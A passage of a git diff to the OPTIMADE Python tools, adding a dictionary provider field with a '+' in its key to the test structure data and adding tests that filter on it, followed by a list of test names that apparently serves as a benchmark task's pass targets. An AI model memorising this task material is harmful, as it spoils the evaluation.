0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 
0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ba", "Ce", "Fe", "H", "Na", "O", "Si", "Ti"], "elements_ratios": [0.045454545454545456, 0.045454545454545456, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.6136363636363636, 0.18181818181818182, 0.045454545454545456], "formula_anonymous": "A27B8C2D2E2FGH", "last_modified": {"$date": "2019-06-08T05:13:37.943Z"}, 
"lattice_vectors": [[3.6001175409341037, 0, 0], [0, 4.438478811675378, 0], [0, 0, 7.718814146224643]], "nelements": 8, "nsites": 44, "pretty_formula": "Ba2Ce2FeHNaO27Si8Ti2", "species": [{"chemical_symbols": ["Ba"], "concentration": [1.0], "name": "Ba"}, {"chemical_symbols": ["Ce"], "concentration": [1.0], "name": "Ce"}, {"chemical_symbols": ["Fe"], "concentration": [1.0], "name": "Fe"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["Na"], "concentration": [1.0], "name": "Na"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["Si"], "concentration": [1.0], "name": "Si"}, {"chemical_symbols": ["Ti"], "concentration": [1.0], "name": "Ti"}], "species_at_sites": ["Ba", "Ba", "Ce", "Ce", "Fe", "H", "Na", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Ti", "Ti"], "structure_features": [], "task_id": "mpf_3803", "_exmpl_this_provider_field": "test"}} -{"type": "structures", "id": "mpf_3819", "attributes": {"immutable_id": "5cfb441f053b174410701bec", "assemblies": null, "chemsys": "Ba-F-H-Mn-Na-O-Re-Si-Ti", "cartesian_site_positions": [[0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 
0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], 
[0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ba", "F", "H", "Mn", "Na", "O", "Re", "Si", "Ti"], "elements_ratios": [0.045454545454545456, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.5909090909090909, 0.045454545454545456, 0.18181818181818182, 0.045454545454545456], "formula_anonymous": "A26B8C2D2E2FGHI", "last_modified": {"$date": "2018-06-08T05:13:37.945Z"}, "lattice_vectors": [[0.541264110585089, 0, 0], [0, 0.5211563701526833, 0], [0, 0, 4.063577553377723]], "nelements": 9, "nsites": 44, "pretty_formula": "Ba2FHMnNaO26Re2Si8Ti2", "species": [{"chemical_symbols": ["Ba"], "concentration": [1.0], "name": "Ba"}, {"chemical_symbols": ["F"], "concentration": [1.0], "name": "F"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["Mn"], "concentration": [1.0], "name": "Mn"}, {"chemical_symbols": ["Na"], "concentration": [1.0], "name": "Na"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["Re"], "concentration": [1.0], "name": "Re"}, {"chemical_symbols": ["Si"], "concentration": [1.0], "name": "Si"}, {"chemical_symbols": ["Ti"], "concentration": [1.0], "name": "Ti"}], "species_at_sites": ["Ba", "Ba", "F", "H", "Mn", "Na", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "Re", "Re", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Ti", "Ti"], "structure_features": [], "task_id": "mpf_3819", "relationships": {"references": {"data": [{"type": "references", "id": "dummy/2019"}]}}}} +{"type": "structures", "id": "mpf_3819", "attributes": {"_exmpl_stability": {"gga_gga+u_r2scan": -0.1}, "immutable_id": "5cfb441f053b174410701bec", "assemblies": null, "chemsys": "Ba-F-H-Mn-Na-O-Re-Si-Ti", "cartesian_site_positions": 
[[0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 
0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ba", "F", "H", "Mn", "Na", "O", "Re", "Si", "Ti"], "elements_ratios": [0.045454545454545456, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.5909090909090909, 0.045454545454545456, 0.18181818181818182, 0.045454545454545456], "formula_anonymous": "A26B8C2D2E2FGHI", "last_modified": {"$date": "2018-06-08T05:13:37.945Z"}, "lattice_vectors": [[0.541264110585089, 0, 0], [0, 0.5211563701526833, 0], [0, 0, 4.063577553377723]], "nelements": 9, "nsites": 44, "pretty_formula": "Ba2FHMnNaO26Re2Si8Ti2", "species": [{"chemical_symbols": ["Ba"], "concentration": [1.0], "name": "Ba"}, {"chemical_symbols": ["F"], "concentration": [1.0], "name": "F"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["Mn"], "concentration": [1.0], "name": "Mn"}, {"chemical_symbols": ["Na"], "concentration": [1.0], "name": "Na"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["Re"], "concentration": [1.0], "name": "Re"}, {"chemical_symbols": ["Si"], 
"concentration": [1.0], "name": "Si"}, {"chemical_symbols": ["Ti"], "concentration": [1.0], "name": "Ti"}], "species_at_sites": ["Ba", "Ba", "F", "H", "Mn", "Na", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "Re", "Re", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Ti", "Ti"], "structure_features": [], "task_id": "mpf_3819", "relationships": {"references": {"data": [{"type": "references", "id": "dummy/2019"}]}}}} {"type": "structures", "id": "mpf_446", "attributes": {"immutable_id": "5cfb441f053b174410700ebf", "assemblies": null, "chemsys": "Ag-Br-Cl-Hg-I-S", "cartesian_site_positions": [[0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ag", "Br", "Cl", "Hg", "I", "S"], "elements_ratios": [0.2222222222222222, 0.05555555555555555, 0.1111111111111111, 
0.2777777777777778, 0.05555555555555555, 0.2777777777777778], "formula_anonymous": "A5B5C4D2EF", "last_modified": {"$date": "2019-06-08T05:13:37.412Z"}, "lattice_vectors": [[5.132691156529571, 0, 0], [0, 1.8270015294181907, 0], [0, 0, 4.5549149749018225]], "nelements": 6, "nsites": 18, "pretty_formula": "Ag4BrCl2Hg5IS5", "species": [{"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["Br"], "concentration": [1.0], "name": "Br"}, {"chemical_symbols": ["Cl"], "concentration": [1.0], "name": "Cl"}, {"chemical_symbols": ["Hg"], "concentration": [1.0], "name": "Hg"}, {"chemical_symbols": ["I"], "concentration": [1.0], "name": "I"}, {"chemical_symbols": ["S"], "concentration": [1.0], "name": "S"}], "species_at_sites": ["Ag", "Ag", "Ag", "Ag", "Br", "Cl", "Cl", "Hg", "Hg", "Hg", "Hg", "Hg", "I", "S", "S", "S", "S", "S"], "structure_features": [], "task_id": "mpf_446", "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_551", "attributes": {"immutable_id": "5cfb441f053b174410700f28", "assemblies": null, "chemsys": "Ag-B-C-Cl-H-N-O-P", "cartesian_site_positions": [[0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 
0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 
0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ag", "B", "C", "Cl", "H", "N", "O", "P"], "elements_ratios": [0.013513513513513514, 0.13513513513513514, 0.20270270270270271, 0.02702702702702703, 0.5405405405405406, 0.013513513513513514, 0.04054054054054054, 0.02702702702702703], "formula_anonymous": "A40B15C10D3E2F2GH", "last_modified": {"$date": "2019-06-08T05:13:37.434Z"}, "lattice_vectors": [[5.055370731514176, 0, 0], [0, 4.77221883540092, 0], [0, 0, 
5.704704278000719]], "nelements": 8, "nsites": 74, "pretty_formula": "AgB10C15Cl2H40NO3P2", "species": [{"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["B"], "concentration": [1.0], "name": "B"}, {"chemical_symbols": ["C"], "concentration": [1.0], "name": "C"}, {"chemical_symbols": ["Cl"], "concentration": [1.0], "name": "Cl"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["N"], "concentration": [1.0], "name": "N"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["P"], "concentration": [1.0], "name": "P"}], "species_at_sites": ["Ag", "B", "B", "B", "B", "B", "B", "B", "B", "B", "B", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "Cl", "Cl", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "N", "O", "O", "O", "P", "P"], "structure_features": [], "task_id": "mpf_551", "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_632", "attributes": {"immutable_id": "5cfb441f053b174410700f79", "assemblies": null, "chemsys": "Ag-C-Cl-H-N-O-S", "cartesian_site_positions": [[0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 
0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ag", "C", "Cl", "H", "N", "O", "S"], "elements_ratios": [0.034482758620689655, 0.10344827586206896, 0.034482758620689655, 0.4827586206896552, 0.20689655172413793, 0.034482758620689655, 0.10344827586206896], "formula_anonymous": "A14B6C3D3EFG", "last_modified": {"$date": "2019-06-08T05:13:37.450Z"}, "lattice_vectors": [[4.438269887249414, 0, 0], [0, 0.0037263506973483906, 0], [0, 0, 2.879535498740032]], "nelements": 7, "nsites": 29, "pretty_formula": "AgC3ClH14N6OS3", "species": [{"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["C"], "concentration": [1.0], "name": "C"}, {"chemical_symbols": ["Cl"], "concentration": [1.0], "name": "Cl"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["N"], "concentration": [1.0], "name": "N"}, 
{"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["S"], "concentration": [1.0], "name": "S"}], "species_at_sites": ["Ag", "C", "C", "C", "Cl", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "N", "N", "N", "N", "N", "N", "O", "S", "S", "S"], "structure_features": [], "task_id": "mpf_632", "_exmpl_this_provider_field": "test"}} diff --git a/optimade/server/data/test_structures.json b/optimade/server/data/test_structures.json index 5a91e3b6..b22e18b7 100644 --- a/optimade/server/data/test_structures.json +++ b/optimade/server/data/test_structures.json @@ -3757,6 +3757,7 @@ ], "structure_features": [], "task_id": "mpf_3819", + "_exmpl_stability": {"gga_gga+u_r2scan": -0.2}, "relationships": { "references": { "data": [ diff --git a/tests/filterparser/test_filterparser.py b/tests/filterparser/test_filterparser.py index 5a01130b..14bca306 100644 --- a/tests/filterparser/test_filterparser.py +++ b/tests/filterparser/test_filterparser.py @@ -269,7 +269,7 @@ class TestParserV1_2_0(TestParserV1_0_0): """ version = (1, 2, 0) - variant = "develop" + variant = "default" def test_boolean_values(self): assert isinstance( @@ -291,3 +291,4 @@ class TestParserV1_2_0(TestParserV1_0_0): self.parse("NOT _exmpl_element_counts = TRUE"), Tree, ) + assert isinstance(self.parse("_mp_stability.gga_gga+u_r2scan <= 0.0"), Tree) diff --git a/tests/filtertransformers/test_mongo.py b/tests/filtertransformers/test_mongo.py index 44f38614..3f3b67c2 100644 --- a/tests/filtertransformers/test_mongo.py +++ b/tests/filtertransformers/test_mongo.py @@ -13,7 +13,7 @@ from optimade.warnings import UnknownProviderProperty class TestMongoTransformer: - version = (1, 0, 0) + version = (1, 2, 0) variant = "default" @pytest.fixture(autouse=True) @@ -41,6 +41,11 @@ class TestMongoTransformer: with pytest.raises(BadRequest): self.transform("BadLuck IS KNOWN") # contains upper-case letters + def test_awkward_nested_field(self): + assert 
self.transform("_mp_stability.gga_gga+u_r2scan <= 0.0") == { + "_mp_stability.gga_gga+u_r2scan": {"$lte": 0.0} + } + def test_provider_property_name(self): # database-provider-specific prefixes assert self.transform("_exmpl_formula_sum = 1") == { diff --git a/tests/server/routers/test_structures.py b/tests/server/routers/test_structures.py index a0e089f2..5c107e79 100644 --- a/tests/server/routers/test_structures.py +++ b/tests/server/routers/test_structures.py @@ -1,8 +1,11 @@ +import pytest + from optimade.models import ( ReferenceResource, StructureResponseMany, StructureResponseOne, ) +from optimade.server.config import CONFIG, SupportedBackend from ..utils import RegularEndpointTests @@ -80,6 +83,19 @@ def test_check_response_single_structure(check_response): check_response(request, expected_ids=expected_ids) +@pytest.mark.xfail( + CONFIG.database_backend == SupportedBackend.ELASTIC, + reason="Elasticsearch implementation does not support nested provider fields.", +) +def test_awkward_nested_provider_field(check_response): + """Tests that structures with a nested provider field that breaks + identifier field names can still be filtered on. 
+ """ + + request = "/structures?filter=_exmpl_stability.gga_gga%2Bu_r2scan < 0" + check_response(request, expected_ids=["mpf_3819"]) + + class TestMissingSingleStructureEndpoint(RegularEndpointTests): """Tests for /structures/<entry_id> for unknown <entry_id>""" diff --git a/tests/server/test_client.py b/tests/server/test_client.py index 796cb1a7..69d9b7bb 100644 --- a/tests/server/test_client.py +++ b/tests/server/test_client.py @@ -509,7 +509,7 @@ def test_list_properties( results = cli.list_properties("structures") for database in results: - assert len(results[database]) == 27, str(results[database]) + assert len(results[database]) == 28, str(results[database]) results = cli.search_property("structures", "site") for database in results: diff --git a/tests/test_config.json b/tests/test_config.json index df614295..a1adee5b 100644 --- a/tests/test_config.json +++ b/tests/test_config.json @@ -22,7 +22,8 @@ "structures": [ "band_gap", {"name": "chemsys", "type": "string", "description": "A string representing the chemical system in an ordered fashion"}, - {"name": "_exmpl_this_provider_field", "type": "string", "description": "A field defined by this provider, added to this config to check whether the server will pass it through without adding two prefixes."} + {"name": "_exmpl_this_provider_field", "type": "string", "description": "A field defined by this provider, added to this config to check whether the server will pass it through without adding two prefixes."}, + {"name": "_exmpl_stability", "type": "dictionary", "description": "A dictionary field with some naughty keys that contain non-URL-safe characters."} ] }, "aliases": {
[ "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_special_cases", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_boolean_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_empty", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_property_names", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_awkward_nested_field", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_provider_property_name", 